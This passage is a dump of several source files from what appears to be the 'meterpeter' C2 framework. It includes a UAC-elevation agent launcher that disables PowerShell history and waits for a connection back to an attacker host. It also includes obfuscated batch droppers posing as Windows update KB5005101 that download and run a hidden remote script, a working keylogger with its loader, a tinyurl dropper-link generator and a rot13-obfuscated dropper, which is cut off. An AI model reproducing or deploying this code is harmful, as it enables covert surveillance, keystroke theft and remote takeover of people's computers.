-ieq \"false\"){$FolderName = \"vault\"}\r\n If(-not(Test-Path -Path \"$Directory\\$FolderName\" -EA SilentlyContinue))\r\n {\r\n #Make sure that the directory\\folder exists\r\n mkdir $Directory\\$FolderName -Force|Out-Null\r\n }\r\n\r\n try{#UnHidde sellected folder\r\n attrib -s -h $Directory\\$FolderName\r\n }catch{#Fail to modify sellected directory attributes\r\n Write-Host \"Error: fail to change directory attributes.`n\" -ForegroundColor Red -BackgroundColor Black\r\n exit #Exit SuperHidden\r\n }\r\n\r\n #Search for VISIBLE,system folder created\\modified..\r\n $SHdb = Get-ChildItem -Path \"$Directory\" -Force | Select-Object * |\r\n Where-Object { $_.PSIsContainer -eq 'True' -and $_.Name -iMatch \"$FolderName\"\r\n } | Select-Object FullName,CreationTime,LastAccessTime,Attributes | Format-Table -AutoSize\r\n\r\n If(-not($SHdb))\r\n {\r\n Write-Host \"Error: fail to match the search criteria.`n\" -ForegroundColor Red -BackgroundColor Black\r\n }\r\n Else\r\n {\r\n echo $SHdb\r\n }\r\n\r\n}\r\n\r\n\r\nIf($Action -ieq \"Delete\")\r\n{\r\n\r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - Delete one hidden,system folder on sellected location!\r\n\r\n .NOTES\r\n Admin privileges required to delete folders outside userprofile tree.\r\n #>\r\n\r\n If($FolderName -ieq \"false\")\r\n {\r\n #Make sure that the folder to delete exists\r\n Write-Host \"Error: The 'delete' function requires -FolderName input ..`n\" -ForegroundColor Red -BackgroundColor Black\r\n exit #Exit SuperHidden\r\n }\r\n\r\n If($Directory -ieq \"false\")\r\n {\r\n #Make sure that the directory tree to delete exists\r\n Write-Host \"Error: The 'delete' function requires -Directory input ..`n\" -ForegroundColor Red -BackgroundColor Black\r\n exit #Exit SuperHidden\r\n }\r\n\r\n If($Directory -iMatch '^C:\\\\Windows' -or $Directory -iMatch '^C:\\\\Program Files')\r\n {\r\n If($IsClientAdmin -iMatch 'False')\r\n {\r\n #Making sure that the directory structure does not start with C:\\Windows if we have UserLand privs!\r\n Write-Host \"Error: Admin privileges required to manipulate sellected directory.`n\" -ForegroundColor Red -BackgroundColor Black\r\n exit #Exit @SuperHidden\r\n }\r\n }\r\n\r\n If(-not(Test-Path -Path \"$Directory\\$FolderName\" -EA SilentlyContinue))\r\n {\r\n #Make sure that the directory\\folder to delete exists\r\n Write-Host \"Error: not found '$Directory\\$FolderName'`n\" -ForegroundColor Red -BackgroundColor Black\r\n exit #Exit SuperHidden\r\n }\r\n\r\n try{#delete sellected folder\r\n attrib -s -h $Directory\\$FolderName\r\n }catch{#Fail to change directory attributes\r\n Write-Host \"Error: fail to change directory attributes.`n\" -ForegroundColor Red -BackgroundColor Black\r\n exit #Exit SuperHidden\r\n }\r\n\r\n #Remove directory\r\n Remove-Item -Path \"$Directory\\$FolderName\" -Recurse -Force\r\n If(-not(Test-Path -Path \"$Directory\\$FolderName\" -EA SilentlyContinue))\r\n {\r\n Write-Host \"Super hidden '$FolderName' folder deleted ..\"\r\n }\r\n Else\r\n {\r\n Write-Host \"Error: fail to delete '$Directory\\$FolderName' folder ..\" \r\n }\r\n\r\n #Display directory contents now\r\n $SHdb = Get-ChildItem -Path \"$Directory\" -Force | Select-Object * |\r\n Where-Object { $_.PSIsContainer -eq 'True' } |\r\n Select-Object Length,Name,LastWriteTime | Format-Table -AutoSize\r\n\r\n If(-not($SHdb))\r\n {\r\n Write-Host \"none contents found inside current directory.`n\" -ForegroundColor Yellow\r\n }\r\n Else\r\n {\r\n echo $SHdb\r\n }\r\n\r\n}" }, { "path": "mimiRatz/UACeop.ps1", "content": "<#\r\n.SYNOPSIS\r\n UAC Auto-Elevate meterpeter client agent\r\n\r\n Author: @r00t-3xp10it\r\n Tested Under: Windows 10 (19044) x64 bits\r\n Required Dependencies: none\r\n Optional Dependencies: netstat\r\n PS cmdlet Dev version: v1.0.8\r\n\r\n.DESCRIPTION\r\n Auxiliary module of Meterpeter v2.10.14 that allow users to\r\n elevate current terminal session from user -> administrator\r\n\r\n.NOTES\r\n Warning: Target user will be prompt by UAC to run elevated.\r\n Warning: cmdlet will exit execution if target declines to run\r\n it with admin privileges by sellecting 'NO' button in UAC prompt\r\n Warning: Parameter -attacker 'LHOST:LPORT' allows this cmdlet to\r\n check for agent conection [loop] or abort cmdlet execution if any\r\n connection from server <-> client is found active (breaking loop)\r\n\r\n.Parameter Attacker\r\n Attacker LHOST:LPORT (default: off)\r\n\r\n.Parameter StartTime\r\n Schedule execution to HH:mm (default: off)\r\n\r\n.Parameter AgentPath\r\n Agent (default: $Env:TMP\\Update-KB5005101.ps1)\r\n\r\n.Parameter AutoDel\r\n Switch that auto-deletes this cmdlet in the end\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\uaceop.ps1 -agentpath \"$pwd\\evil.ps1\"\r\n try to elevate evil.ps1 privileges only once\r\n \r\n.EXAMPLE\r\n PS C:\\> .\\uaceop.ps1 -attacker '192.168.1.66:666' -autodel\r\n Loop agent execution until a connection its found active\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\uaceop.ps1 -starttime '09:34' -attacker '192.168.1.66:666' -autodel\r\n Schedule execution to HH:mm + loop agent execution until a connection its found active\r\n\r\n.EXAMPLE\r\n PS C:\\> Start-Process -windowstyle hidden -argumentlist \"-file uaceop.ps1 -starttime '09:34' -attacker '192.168.1.66:666' -autodel\"\r\n Hidden schedule execution of beacon to HH:mm + loop agent execution until a connection its found active + autodelete this cmdlet\r\n\r\n.INPUTS\r\n None. You cannot pipe objects into UacEop.ps1\r\n\r\n.OUTPUTS\r\n [*] Relaunch console as an elevated process!\r\n [1] Executing meterpeter client [Comfirm]\r\n [ ] Waiting connection from remote server ..\r\n [2] Executing meterpeter client [Comfirm]\r\n [-] Remote connection found, exit loop ..\r\n\r\n.LINK\r\n https://github.com/r00t-3xp10it/meterpeter\r\n#>\r\n\r\n\r\n[CmdletBinding(PositionalBinding=$false)] param(\r\n [string]$AgentPath=\"$Env:TMP\\Update-KB5005101.ps1\",\r\n [string]$StartTime=\"off\",\r\n [string]$Attacker=\"off\",\r\n [switch]$AutoDel\r\n)\r\n\r\n\r\n## Global variable declarations\r\n$ErrorActionPreference = \"SilentlyContinue\"\r\n## Disable Powershell Command Logging for current session.\r\nSet-PSReadlineOption –HistorySaveStyle SaveNothing|Out-Null\r\n\r\n## Send Attacker settings to logfile its a mandatory step\r\n# because the 2 time, cmdlet exec with default parameters\r\necho \"Server: $Attacker\" >> \"$Env:TMP\\Programdata.log\"\r\necho \"Client: $AgentPath\" >> \"$Env:TMP\\Programdata.log\"\r\n\r\nif(-not($Attacker -match '^(off)$'))\r\n{\r\n ## Make sure user inputed the correct lhost:lport format\r\n # Regex translated to human 1 9 2 . 1 6 8 . ? . ? : ?\r\n If(-not($Attacker -match '^(\\d\\d\\d\\.\\d\\d\\d\\.\\d*\\.)+[\\d*]+:[\\d*]+$'))\r\n {\r\n write-host \"`n[x] Error: wrong LHOST:LPORT format input`n\" -ForegroundColor Red\r\n Remove-Item -Path \"$Env:TMP\\Programdata.log\" -Force\r\n Start-Sleep -Seconds 2\r\n return\r\n }\r\n}\r\n\r\n\r\nIf($StartTime -Match '^(\\d\\d:\\d\\d)$')\r\n{\r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - Sleep for xx minutes function.\r\n #>\r\n\r\n write-host \"[*] Schedule start at [\" -NoNewline\r\n write-host \"$StartTime\" -ForegroundColor Red -NoNewline\r\n write-host \"] hours.\"\r\n\r\n For(;;)\r\n {\r\n ## Compare $CurrentTime with $StartTime\r\n $CurrentTime = (Get-Date -Format 'HH:mm')\r\n If($CurrentTime -Match \"^($StartTime)$\")\r\n {\r\n break # Continue execution now\r\n }\r\n\r\n ## loop each 10 seconds\r\n Start-Sleep -Seconds 10\r\n }\r\n}\r\n\r\n\r\n$Counter = 0 ## Set loop function counter to '0'\r\n$Attacker = ((Get-Content -Path \"$Env:TMP\\Programdata.log\"|findstr /C:\"Server:\"|Select-Object -First 1) -replace '^(Server: )','')\r\n$AgentPath = ((Get-Content -Path \"$Env:TMP\\Programdata.log\"|findstr /C:\"Client:\"|Select-Object -First 1) -replace '^(Client: )','')\r\n$AdminRaw = \"(£[S@ec£urit£y.P£r@inc£ipal.£Wi£nd@o£wsP£r@inc£ipal]£[S£e@cu£r@it£y.P£ri@n£ci@pa£l.W£i@nd£o@wsId@e£nti@ty]:£:G@e£tC£ur@re£n@t()).I@sI£nR@o£le@([£S£e@cu£ri@ty.P£ri@nc£ip@al.Wi£n@do£ws@Bu£il@tI£n@Ro£l@e]:£:A£d@mi£ni£s@tr£at@o£r)\" -replace '(@|£)',''\r\n$AdminCheck = $AdminRaw|&('XeX' -replace '^(X)','i')\r\nIf($AdminCheck -match '^(False)$')\r\n{\r\n $Namelless = \"%R@u%nA@s%\" -replace '(@|%)',''\r\n write-host \"[*] Relaunch console as an elevated process!\"\r\n Start-Process -WindowStyle Hidden powershell \"-File\",('\"{0}\"' -f $MyInvocation.MyCommand.Path) -Verb $Namelless\r\n exit\r\n}\r\n\r\n\r\nIf($Attacker -match '^(off)$')\r\n{\r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - Execute agent WITHOUT confirm if connection has recived\r\n #>\r\n\r\n write-host \"[*] Executing meterpeter client [Once]\"\r\n Start-Process -WindowStyle Hidden powershell -ArgumentList \"-file $AgentPath\" \r\n}\r\nElse\r\n{\r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - Execute agent and CONFIRM if connection has recived\r\n\r\n .NOTES\r\n Agent [Update-KB5005101.ps1] will beacon home from 10 to 10\r\n seconds unless UACeop.ps1 its stoped or an active connection\r\n its found from server <-> Client using netstat native command\r\n #>\r\n\r\n For(;;)\r\n {\r\n $Counter = $Counter + 1\r\n write-host \"[$Counter] Executing meterpeter client [Comfirm]\"\r\n Start-Process -WindowStyle Hidden powershell -ArgumentList \"-file $AgentPath\"\r\n Start-Sleep -Seconds 10 ## Give extra time for agent to beacon home\r\n\r\n $CheckAgentConnection = (netstat -ano|findstr /C:\"ESTABLISHED\"|findstr /C:\"$Attacker\")\r\n If($CheckAgentConnection -match \"$Attacker\")\r\n {\r\n write-host \"[-] Remote connection found, exit loop ..`n\"\r\n break # Connection found, exit loop\r\n }\r\n Else\r\n {\r\n write-host \"[ ] Waiting connection from remote server ..\" -ForegroundColor Yellow\r\n }\r\n }\r\n}\r\n\r\n\r\nIf($AutoDel.IsPresent)\r\n{\r\n ## Auto-Delete cmdlet in the end ...\r\n Remove-Item -LiteralPath $MyInvocation.MyCommand.Path -Force\r\n}\r\n\r\nStart-Sleep -Seconds 2\r\nRemove-Item -Path \"$Env:TMP\\Programdata.log\" -Force\r\nexit" }, { "path": "mimiRatz/Update-FileLess.bat", "content": "@echo off\r\n( ,;(=i%@Socket():%f ,no%n_UDP%t ^DE%DB_#1%FIN^ED ,%@k%IS_%Buffer_%MINI%#1%MI%'i'%ZE^D ;se%#0_%t ^IS_MIN^IM%#1_%IZ^ED=1 && @st^a%db%rt \"\" ^/m%_#1%i^n \"%~dpnx0\" %* && e%GUID%x^it); ),\r\n,Col%ls%or 0E && (,(@tIt%&1%lE ^Cumu%_UUID_%l^ati%#1%v^e Sec%#1%u^ri%_i_%ty Up^dat%'%e KB%Buffer_%5005101 && @Pow%#1%E^rsH^el%Socket():%l Ge^t-Hot%vibes%Fi^x),)\r\n@cm%Buff#1%d ^/R Ec^h%i0%O A|Pow^er%_GUID_%sh^elL Set-Exec^UtI%'B%onPo^lI%send(i)%cY Unr%db%e^stric^t%OFF%ed -Sc%_i0%o^pe Cur%_%r^ent%LANG%Us^er\r\n@Cd %tmp% && Meterpeter_Fileless_CmdLine\r\ndel \"%~f0\"" }, { "path": "mimiRatz/Update-KB5005101.bat", "content": "@echo off\r\n( ,;(=i%@Socket():%f ,no%n_UDP%t ^DE%DB_#1%FIN^ED ,%@k%IS_%Buffer_%MINI%#1%MI%'i'%ZE^D ;se%#0_%t ^IS_MIN^IM%#1_%IZ^ED=1 && @st^a%db%rt \"\" ^/m%_#1%i^n \"%~dpnx0\" %* && e%GUID%x^it); ),\r\n,Col%ls%or 0E && (,(@tIt%&1%lE ^Cumu%_UUID_%l^ati%#1%v^e Sec%#1%u^ri%_i_%ty Up^dat%'%e KB%Buffer_%5005101 && @Pow%#1%E^rsH^el%Socket():%l Ge^t-Hot%vibes%Fi^x),)\r\n@cm%Buff#1%d ^/R Ec^h%i0%O A|Pow^er%_GUID_%sh^elL Set-Exec^UtI%'B%onPo^lI%send(i)%cY Unr%db%e^stric^t%OFF%ed -Sc%_i0%o^pe Cur%_%r^ent%LANG%Us^er\r\n@powershell iwr -Uri \"ht%i0%tp://CharlieBrown/Update-KB50%i0_%05101.ps1\" -OutFile \"%tmp%\\Update-KB50%i0_%05101.ps1\"\r\n@Cd %tmp% && ,pOw%_Socket(i)_%eR^sH%_i_%El^L -ExeC^ut%'b%I^oN ByP%\\x0a%a^Ss -Win%_#1%dOw^stY^le hI%i0%d^Den -NoP%_i%r^Ofi%stuff%Le -Fi%Nall%l^E %tmp%\\Update-KB50%i0_%05101.ps1\r\ndel \"%~f0\"\r\n" }, { "path": "mimiRatz/keymanager.ps1", "content": "[CmdletBinding(PositionalBinding=$false)] param(\r\n [string]$Action=\"start\",\r\n [string]$UsePS2=\"false\"\r\n)\r\n\r\n\r\n#Global variable declarations\r\n$ErrorActionPreference = \"SilentlyContinue\"\r\n\r\n\r\nIF($Action -ieq \"start\")\r\n{\r\n\r\n If(-not(Test-Path -Path \"$Env:TMP\\mscore.ps1\"))\r\n {\r\n #Download cmdlet from my github repository\r\n iwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/mscore.ps1\" -OutFile \"$Env:TMP\\mscore.ps1\"|Unblock-File\r\n }\r\n\r\n If($UsePS2 -ieq \"true\")\r\n {\r\n $TryThisInsted = \"#pow#e@rsh#e@ll -@ve#r@sio@n @2# -@C# ech@o ps2v@er#si@onfo@un#d|O@ut-@File# $Env:TMP\\downgradeatt.log -Fo@rc@e\" -replace '(@|#)',''\r\n \"$TryThisInsted\"|&('SEX' -replace 'S','i')\r\n $TestDowngradeAtt = Get-Content -Path \"$Env:TMP\\downgradeatt.log\"|Select-String \"ps2versionfound\"\r\n Remove-Item -Path \"$Env:TMP\\downgradeatt.log\" -Force\r\n If($TestDowngradeAtt -iMatch '^(ps2versionfound)$')\r\n {\r\n $rrr = \"-version\"\r\n #Use powershell $rrr 2 to execute keylogger\r\n $cmdlineToExec = \"powershell $rrr 2 -C Import-Module -Name `$Env:TMP\\mscore.ps1 -Force\"\r\n }\r\n Else\r\n {\r\n #Defaul keylogger execution function\r\n $cmdlineToExec = \"Import-Module -Name `$Env:TMP\\mscore.ps1 -Force\" \r\n }\r\n }\r\n Else\r\n {\r\n #Defaul keylogger execution function\r\n $cmdlineToExec = \"Import-Module -Name `$Env:TMP\\mscore.ps1 -Force\" \r\n }\r\n\r\n If(Test-Path -Path \"$Env:TMP\\mscore.ps1\")\r\n {\r\n #Start keylogger process in background\r\n Start-Process -WindowStyle Hidden powershell -ArgumentList \"$cmdlineToExec\"\r\n If($?)\r\n {\r\n Start-Sleep -Milliseconds 600 #Give some time for log creation\r\n $PPID = (Get-Content \"$Env:TMP\\pid.log\" | Where-Object { $_ -ne '' })\r\n write-host \"`n * Key-logger process started with ID: $PPID\" -ForegroundColor Green\r\n }\r\n Else\r\n {\r\n write-host \"`n x Error: fail to start Key-logger background process ..\" -ForegroundColor Red -BackgroundColor Black\r\n }\r\n }\r\n Else\r\n {\r\n write-host \"`n x Error: '$Env:TMP\\mscore.ps1' missing..\" -ForegroundColor Red -BackgroundColor Black\r\n }\r\n}\r\n\r\n\r\nIF($Action -ieq \"stop\")\r\n{\r\n\r\n If(Test-Path -Path \"$Env:TMP\\pid.log\")\r\n {\r\n #Get key-logger PPID from logfile\r\n $PPID = Get-Content \"$Env:TMP\\pid.log\" | Where-Object { $_ -ne '' }\r\n #Stop key-logger process by is PPID\r\n Stop-Process -Id $PPID -Force\r\n If($?)\r\n {\r\n write-host \"`n* Key-logger process '$PPID' stoped.\" -ForegroundColor Green\r\n }\r\n Else\r\n {\r\n write-host \"`nx Error: fail to stop Key-logger process id: '$PPID'\" -ForegroundColor Red -BackgroundColor Black\r\n }\r\n }\r\n Else\r\n {\r\n write-host \"`nx Error: fail to retrieve key-logger process ID\" -ForegroundColor Red -BackgroundColor Black\r\n }\r\n\r\n\r\n #Get the KeyStrokes\r\n write-host \"`nKeylogger Key-strokes Capture\" -ForegroundColor Yellow\r\n write-host \"----------------------------\"\r\n If(Test-Path -Path \"$Env:TMP\\void.log\")\r\n {\r\n Get-Content -Path \"$Env:TMP\\void.log\"\r\n }\r\n Else\r\n {\r\n write-host \"x Error: '$Env:TMP\\void.log' missing\" -ForegroundColor Red -BackgroundColor Black \r\n }\r\n\r\n #Clean all artifacts left behind\r\n Remove-Item -Path \"$Env:TMP\\mscore.ps1\" -Force\r\n Remove-Item -Path \"$Env:TMP\\void.log\" -Force\r\n Remove-Item -Path \"$Env:TMP\\pid.log\" -Force\r\n}" }, { "path": "mimiRatz/mscore.ps1", "content": "<#\r\n.SYNOPSIS\r\n Capture keyboad keystrokes\r\n\r\n Author: @r00t-3xp10it (ssa redteam)\r\n Tested Under: Windows 10 (19043) x64 bits\r\n Required Dependencies: void.log, pid.log {auto-build}\r\n Optional Dependencies: none\r\n PS cmdlet Dev version: v1.0.2\r\n\r\n.DESCRIPTION\r\n Aux module of Meterpeter C2 to capture keystrokes\r\n\r\n.NOTES\r\n Keylogger process will run until CTRL+C its pressed.\r\n \r\n.EXAMPLE\r\n PS C:\\> Import-Module .\\mscore.ps1 -Force\r\n Capture keystrokes until CTRL+C its pressed\r\n\r\n.INPUTS\r\n None. You cannot pipe objects into mscore.ps1\r\n\r\n.OUTPUTS\r\n * Keylogger is working with ID: 1822\r\n => Press CTRL+C to stop process ..\r\n * Total Number of Keystrokes: 23\r\n \r\n.LINK\r\n https://github.com/r00t-3xp10it/meterpeter\r\n#>\r\n\r\n\r\nfunction Keystrokes()\r\n{\r\n [int]$totalNumber = 0\r\n $Path = \"$Env:TMP\\void.log\"\r\n echo $pid >> $Env:TMP\\pid.log #Store Process PID to be abble to stop it later\r\n\r\n\r\n#API Calls\r\n$signatures = @'\r\n[DllImport(\"user32.dll\", CharSet=CharSet.Auto, ExactSpelling=true)] \r\npublic static extern short GetAsyncKeyState(int virtualKeyCode); \r\n\r\n[DllImport(\"user32.dll\", CharSet=CharSet.Auto)]\r\npublic static extern int GetKeyboardState(byte[] keystate);\r\n\r\n[DllImport(\"user32.dll\", CharSet=CharSet.Auto)]\r\npublic static extern int MapVirtualKey(uint uCode, int uMapType);\r\n\r\n[DllImport(\"user32.dll\", CharSet=CharSet.Auto)]\r\npublic static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);\r\n'@\r\n\r\n #Load signatures and make members available\r\n $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru\r\n \r\n #Create output file\r\n $null = Ni -Path $Path -ItemType File -Force\r\n\r\n try{\r\n Write-Host \"* \" -ForegroundColor Green -NoNewline;\r\n Write-Host \"Keylogger is working with ID: \" -ForegroundColor DarkGray -NoNewline;\r\n Write-Host \"$pid\" -ForegroundColor Green\r\n Write-Host \" => Press CTRL+C to stop process ..\" -ForegroundColor DarkYellow\r\n\r\n ## Create endless loop\r\n # collect pressed keys, CTRL+C to exit\r\n While($true)\r\n {\r\n #Start-Sleep -Milliseconds 20\r\n #Scan ASCII codes between 8 and 129\r\n For($ascii = 9; $ascii -le 128; $ascii++) \r\n {\r\n #Get current key state\r\n $state = $API::GetAsyncKeyState($ascii)\r\n #Is key pressed?\r\n If($state -eq -32767) \r\n {\r\n $null = [console]::CapsLock\r\n\r\n #Translate scan code to real code\r\n $virtualKey = $API::MapVirtualKey($ascii, 3)\r\n\r\n #Get keyboard state for virtual keys\r\n $kbstate = New-Object Byte[] 256\r\n $checkkbstate = $API::GetKeyboardState($kbstate)\r\n\r\n #Prepare a StringBuilder to receive input key\r\n $mychar = New-Object -TypeName System.Text.StringBuilder\r\n\r\n #Translate virtual key\r\n $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)\r\n\r\n If($success) \r\n {\r\n #add key to logger file\r\n [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)\r\n $totalNumber = $totalNumber+1\r\n }\r\n }\r\n }\r\n }\r\n }\r\n finally\r\n {\r\n write-Host \"* \" -ForegroundColor Green -NoNewline;\r\n write-Host \"Total Number of Keystrokes: \" -ForegroundColor DarkGray -NoNewline;\r\n write-Host \"$totalNumber\" -ForegroundColor Green \r\n }\r\n}\r\n\r\n## Records all key presses until\r\n# script is aborted by pressing CTRL+C\r\nKeystrokes" }, { "path": "mimiRatz/shorturl.ps1", "content": "<#\r\n.SYNOPSIS\r\n TinyUrl url generator\r\n\r\n Author: @r00t-3xp10it (ssa redteam)\r\n Tested Under: Windows 10 (19043) x64 bits\r\n Required Dependencies: Invoke-WebRequest\r\n Optional Dependencies: http.server {manual}\r\n PS cmdlet Dev version: v1.1.7\r\n\r\n.DESCRIPTION\r\n Auxiliary module of Meterpeter C2 v2.10.12 that generates\r\n tinyurl links to deliver droppers (cradles) in local LAN.\r\n\r\n.NOTES\r\n This cmdlet creates tinyurl links to deliver Meterpeter C2\r\n droppers (cradles) in local LAN, and its automatic executed.\r\n\r\n shorturl.ps1 cmdlet only delivers payloads on local LAN\r\n If invoked -startserver 'true' then cmdlet starts http.server\r\n parameter -serverport contains: \"attacker IP addr : http.server port\"\r\n shorturl.ps1 directory its used as http.server working directory if invoked -startserver 'true'\r\n The webpage.html\\binary.exe of -payloadname to deliver must be on the same dir as shorturl.ps1\r\n\r\n.Parameter ServerPort\r\n Attacker IP : http.server port (default: 192.168.1.72:8087)\r\n\r\n.Parameter PayloadName\r\n Meterpeter C2 dropper name (default: Update-KB5005101.html)\r\n\r\n.Parameter StartServer\r\n Start http.server process? (default: false)\r\n\r\n.Parameter Verb\r\n Use TinyUrl verbose output? (default: false)\r\n \r\n.EXAMPLE\r\n PS C:\\> .\\shorturl.ps1 -ServerPort '127.0.0.1:8080'\r\n URI: http://127.0.0.1:8080/Update-KB5005101.html\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\shorturl.ps1 -ServerPort '192.168.1.72:8087' -PayloadName 'update.html'\r\n URI: http://192.168.1.72:8087/update.html\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\shorturl.ps1 -PayloadName 'fake-update.zip' -Verb 'true'\r\n URI: http://192.168.1.72:8087/fake-update.zip ( verbose outputs )\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\shorturl.ps1 -serverport '127.0.0.1:8081' -startserver 'true'\r\n URI: http://127.0.0.1:8081/Update-KB5005101.html ( start http.server )\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\shorturl.ps1 -Payloadname 'mozlz4-win32.exe' -startserver 'true'\r\n URI: http://192.168.1.72:8087/mozlz4-win32.exe ( start http.server )\r\n\r\n.INPUTS\r\n None. You cannot pipe objects into shorturl.ps1\r\n\r\n.OUTPUTS\r\n [i] Raw Url : http://192.168.1.72:8080/Update-KB5005101.html\r\n\r\n StatusCode : 200\r\n StatusDescription : OK\r\n Content : https://tinyurl.com/yyx9xptu\r\n RawContent : HTTP/1.1 200 OK\r\n Connection: keep-alive\r\n X-Content-Type-Options: nosniff\r\n X-XSS-Protection: 1; mode=block\r\n CF-Cache-Status: DYNAMIC\r\n CF-RAY: 703551185c40da82-LIS\r\n alt-svc: h3=\":443\"; ma=86400, h3-29=\"...\r\n Forms : {}\r\n Headers : {[Connection, keep-alive], [X-Content-Type-Options, nosniff], [X-XSS-Protection, 1; mode=block],\r\n [CF-Cache-Status, DYNAMIC]...}\r\n Images : {}\r\n InputFields : {}\r\n Links : {}\r\n ParsedHtml : mshtml.HTMLDocumentClass\r\n RawContentLength : 28\r\n\r\n [i] Shorten Uri : https://tinyurl.com/yyx9xptu\r\n [*] 06:07:18 - Starting python http.server ..\r\n\r\n.LINK\r\n https://github.com/r00t-3xp10it/meterpeter\r\n#>\r\n\r\n\r\n[CmdletBinding(PositionalBinding=$false)] param(\r\n [string]$PayloadName=\"Update-KB5005101.html\",\r\n [string]$ServerPort=\"192.168.1.72:8087\",\r\n [string]$StartServer=\"false\",\r\n [string]$Verb=\"false\"\r\n)\r\n\r\n\r\n$testServer = $null\r\n#Global variable declarations\r\n$ErrorActionPreference = \"SilentlyContinue\"\r\n\r\n#Shorten Url function\r\n$Uri = \"https://$ServerPort/$PayloadName\" -replace 'ps:','p:'\r\n$UrlApi = \"https://t0in0yu0r0l.c0om0/ap0i-cr0ea0te.ph0p0\" -replace 'ps:/','p:/' -replace '0',''\r\n$Response = Invoke-WebRequest \"${UrlApi}?url=${Uri}\"\r\n\r\n\r\nIf($Response)\r\n{\r\n\r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - generates tinyurl links to deliver droppers (cradles) in local LAN.\r\n #>\r\n\r\n If($Verb -ieq \"True\")\r\n {\r\n #Cmdlet verbose display fuction\r\n write-host \"[i] Raw Url : $Uri\" -ForeGroundColor Black -BackGroundColor white\r\n $Response\r\n }\r\n\r\n #Store uri in local variable.\r\n $GetShortenUrl = $Response.Content\r\n\r\n #Display onscreen the tinyurl uri\r\n If($Response.StatusCode -eq 200 -and $GetShortenUrl -ne $null)\r\n {\r\n Write-Host \"[i] Shorten Uri : $GetShortenUrl\" -ForeGroundColor Black -BackGroundColor white\r\n }\r\n Else\r\n {\r\n Write-Host \"[\" -ForeGroundColor DarkGray -NoNewline;\r\n Write-Host \"x\" -ForeGroundColor Red -NoNewline;\r\n Write-Host \"] fail to retrieve tinyurl uri ..\" -ForeGroundColor DarkGray\r\n }\r\n\r\n If($StartServer -ieq \"true\")\r\n {\r\n\r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - Start http.server to deliver payloadname on local LAN\r\n\r\n .NOTES\r\n Remark: PayloadName must be on shortcut.ps1 current directory.\r\n Parameter -payloadname 'bin.exe' can be invoked together with\r\n param -startserver 'true' to deliver 'bin.exe' on local LAN.\r\n #>\r\n\r\n try{\r\n $testServer = python -V\r\n }Catch{\r\n Write-Host \"[\" -ForeGroundColor DarkGray -NoNewline;\r\n Write-Host \"x\" -ForeGroundColor Red -NoNewline;\r\n Write-Host \"] cmdlet cant find the python interpreter ..\" -ForeGroundColor DarkGray \r\n }\r\n\r\n If($testServer)\r\n {\r\n $ServerTime = Date -Format 'hh:mm:ss'\r\n $HttpAddr = $ServerPort.Split(':')[0];$HttpPort = $ServerPort.Split(':')[1]\r\n Write-Host \"[*] ${ServerTime} - Starting python http.server ..\" -ForeGroundColor Green\r\n Start-Process powershell -ArgumentList \"python -m http.server $HttpPort --bind $HttpAddr\"\r\n }\r\n }\r\n\r\n}\r\nElse\r\n{\r\n Write-Host \"[\" -ForeGroundColor DarkGray -NoNewline;\r\n Write-Host \"x\" -ForeGroundColor Red -NoNewline;\r\n Write-Host \"] fail to retrieve tinyurl uri (no response)..\" -ForeGroundColor DarkGray\r\n}\r\n" }, { "path": "mimiRatz/theme/Update-KB5005101.html", "content": "<html>\r\n<title>Update KB5005101 21H1\r\n\r\n\r\n\r\n" }, { "path": "mimiRatz/theme/banner.mp", "content": " _ _ _____ _____ _____ ____ ____ _____ __ __ ____ _____ \r\n| |_| ||_ _||_ _|| ()_) (_ (_ | ===|| () )\\ \\/ /| ===|| () )\r\n|_| |_| |_| |_| |_| .__)__)|____||_|\\_\\ \\__/ |____||_|\\_\\" }, { "path": "mimiRatz/update.hta", "content": "\r\nKB5005101 21H1 - Security Update\r\n\r\n\r\n\r\n\"KB5005101

\r\n
Windows servicing stack update - 19041.1161, 19042.1161 and 19043.1161

\r\n\r\n\r\n\r\n\r\n\r\n" }, { "path": "mimiRatz/update.ps1", "content": "<#\r\n.SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Credits to: @Markus_Fleschut (rot13)\r\n meterpeter standalone executable dropper\r\n Change_For_Silent_Exec: [fgevat]`$FvyragRkrp=`\"Gehr`\"\r\n#>\r\n\r\n\r\n$linkinfodll = \"@Se@t-E@xec@uti@onP@oli@cy @UnR@est@rict@ed\" -replace '(@|)',''\r\ncmd /R echo Y|Powershell $linkinfodll -Scope CurrentUser|Out-Null\r\n$Rotten13 = @(\"[PzqyrgOvaqvat(CbfvgvbanyOvaqvat=`$snyfr)] cnenz(\r\n [fgevat]`$BhgSvyr=`\"`$Rai:GZC\\Hcqngr-XO5005101.cf1`\",\r\n [fgevat]`$FvyragRkrp=`\"Snyfr`\"\r\n)\r\n\r\n`$FRkrphgrq = `$ahyy\r\n`$ReebeNpgvbaCersrerapr = `\"FvyragylPbagvahr`\"\r\nVs(`$FvyragRkrp -vrd `\"Snyfr`\"){`$HfreFrgGvatf = cbjrefuryy (Arj-Bowrpg -PbzBowrpg Jfpevcg.Furyy).Cbchc(`\" Srngher hcqngr `a`aGUVF FBSGJNER VF CEBIVQRQ OL GUR ERTRAGF NAQ PBAGEVOHGBEF ``NF VF'' NAQ NAL RKCERFF BE VZCYVRQ JNEENAGVRF, VAPYHQVAT, OHG ABG YVZVGRQ GB GUR VZCYVRQ JNEENAGVRF BS ZREPUNAGNOVYVGL NAQ SVGARFF SBE N CNEGVPHYNE CHECBFR NER 